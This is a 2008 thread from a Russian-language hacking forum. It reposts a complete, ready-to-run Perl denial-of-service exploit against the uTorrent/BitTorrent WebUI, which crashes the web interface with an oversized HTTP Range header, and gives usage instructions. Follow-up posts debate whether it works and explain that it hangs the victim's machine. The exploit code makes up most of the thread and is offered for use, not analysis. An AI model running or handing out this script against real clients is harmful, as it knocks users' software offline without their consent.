ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit
  #1  
Старый 29.06.2008, 21:35
Аватар для YoYo Factory
YoYo Factory
Участник форума
Регистрация: 25.03.2008
Сообщений: 138
Провел на форуме:
1105166

Репутация: 201
Отправить сообщение для YoYo Factory с помощью ICQ
По умолчанию uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit

uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit

Код:
uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit 	

#!/usr/bin/perl
# uTorrent / BitTorrent  WebIU HTTP 1.7.7/6.0.1 Range header Denial of Service exploit
# according to the following advisory: http://secunia.com/advisories/30605
#
# usage: WebUI-dos.pl <url> <port> <user:pass>
# Exploit written by Exodus.
# http://www.blackhat.org.il

use IO::Socket;
use MIME::Base64;

if(@ARGV < 3)
{ &usage; }

($host,$ref) = split(/\//,$ARGV[0]);

$sock = IO::Socket::INET->new(PeerAddr => "$host:$ARGV[1]", Proto =>'TCP') || die("[X]Couldnt connect to host: $host:$ARGV[1]\n");
$buff = "E" x 60000;
$up = encode_base64($ARGV[2]);
chomp($up);

print $sock "GET /gui/common.js HTTP/1.1\r\n".
"Host: $host\r\n".
"Authorization: Basic $up\r\n".
"Range: bytes=$buff\r\n".
"Connection: close\r\n\r\n";

close($sock);

print "[!]Payload sent, WebUI should be down...\n";



sub usage
{
	print "usage $0 <url> <port> <user:pass>\n".
		  "ex: $0 127.0.0.1/gui/common.js 1337 admin:admin\n";
	exit;
}
© Astalavista.com

Сорри если не туда запостил, переместите если не туда плиз!
 
Ответить с цитированием

  #2  
Старый 30.06.2008, 10:53
Аватар для geforse
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841

Репутация: 712


Отправить сообщение для geforse с помощью ICQ
По умолчанию

Можно описание поподробней,,,это ДоС уторрента ? или торрент трекера ?
 
Ответить с цитированием

  #3  
Старый 30.06.2008, 10:59
Аватар для P(i)n*Fl0p1
P(i)n*Fl0p1
Участник форума
Регистрация: 19.12.2006
Сообщений: 173
Провел на форуме:
1812111

Репутация: 125
Отправить сообщение для P(i)n*Fl0p1 с помощью ICQ
По умолчанию

Цитата:
Сообщение от geforse  
Можно описание поподробней,,,это ДоС уторрента ? или торрент трекера ?
Эксплоит для поднятия ранга\репы на юторент трекерах?


А работает ли?ты проверял сам?
 
Ответить с цитированием

  #4  
Старый 30.06.2008, 11:59
Аватар для YoYo Factory
YoYo Factory
Участник форума
Регистрация: 25.03.2008
Сообщений: 138
Провел на форуме:
1105166

Репутация: 201
Отправить сообщение для YoYo Factory с помощью ICQ
По умолчанию

Цитата:
Сообщение от geforse  
Можно описание поподробней,,,это ДоС уторрента ? или торрент трекера ?
Написано же HTTP 1.7.7
 
Ответить с цитированием

  #5  
Старый 30.06.2008, 12:01
Аватар для YoYo Factory
YoYo Factory
Участник форума
Регистрация: 25.03.2008
Сообщений: 138
Провел на форуме:
1105166

Репутация: 201
Отправить сообщение для YoYo Factory с помощью ICQ
По умолчанию

Цитата:
Сообщение от P(i)n*Fl0p1  
Эксплоит для поднятия ранга\репы на юторент трекерах?


А работает ли?ты проверял сам?
Перед тем как спрашивать лучше сам проверил бы!
Если выложил значит работает!
Может кстати сейчас не будет, не знаю может админы прикрыл, но к тому моменту, когда создал тему, работала!
 
Ответить с цитированием

  #6  
Старый 04.07.2008, 22:45
Аватар для gisTy
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

вообще то если уж на то пошло, то это скрипт который подвешивает мащину юзера, на которой стоит uTorrent с WebUI (панель управления клиентом через веб)...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Живые прокси xdx ICQ 111 15.04.2007 13:10



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ